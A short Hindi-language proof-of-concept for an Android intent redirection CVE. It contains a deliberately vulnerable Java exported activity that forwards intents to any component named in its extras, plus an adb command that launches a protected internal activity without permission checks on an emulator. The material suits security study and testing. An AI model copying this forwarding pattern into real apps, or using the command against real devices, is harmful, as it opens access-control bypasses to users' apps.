
CVE-2026-22010 Android intent redirection के लिए प्रूफ-ऑफ-कॉन्सेप्ट: एक एक्सपोर्टेड एक्टिविटी को प्रदर्शित करता है जो इंटेंट्स को हमलावर-नियंत्रित आंतरिक घटकों तक अग्रेषित करती है, अनुमति जांचों को दरकिनार करती है, साथ ही कमजोर Java कोड और adb एक्सप्लॉइट चरणों के साथ।
// VulnActivity.java - Exported activity that forwards intents
public class VulnActivity extends Activity {
@Override
protected void onCreate(Bundle b) {
super.onCreate(b);
Intent incoming = getIntent();
// Retrieve target component from extras
String targetPkg = incoming.getStringExtra("pkg");
String targetCls = incoming.getStringExtra("cls");
Intent forward = new Intent();
forward.setClassName(targetPkg, targetCls);
// Copy all extras from original intent
forward.putExtras(incoming);
startActivity(forward);
}
}
एक एक्सपोर्टेड एंड्रॉइड एक्टिविटी आने वाले इंटेंट को इंटेंट के एक्स्ट्रा में निर्दिष्ट कंपोनेंट पर आँख बंद करके रीडायरेक्ट करती है। एक हमलावर ऐसा इंटेंट तैयार कर सकता है जो ऐप को हमलावर-नियंत्रित डेटा के साथ एक सुरक्षित आंतरिक एक्टिविटी लॉन्च करने के लिए प्रेरित करे, जिससे अनुमति जाँच को बायपास किया जा सके।
कमजोर ऐप को एंड्रॉइड इम्यूलेटर पर तैनात करें। adb के माध्यम से एक इंटेंट भेजें:
adb shell am start -n com.example/.VulnActivity --es pkg com.example.internal --es cls com.example.SecretActivity
आंतरिक एक्टिविटी उचित अनुमतियों के बिना लॉन्च होती है।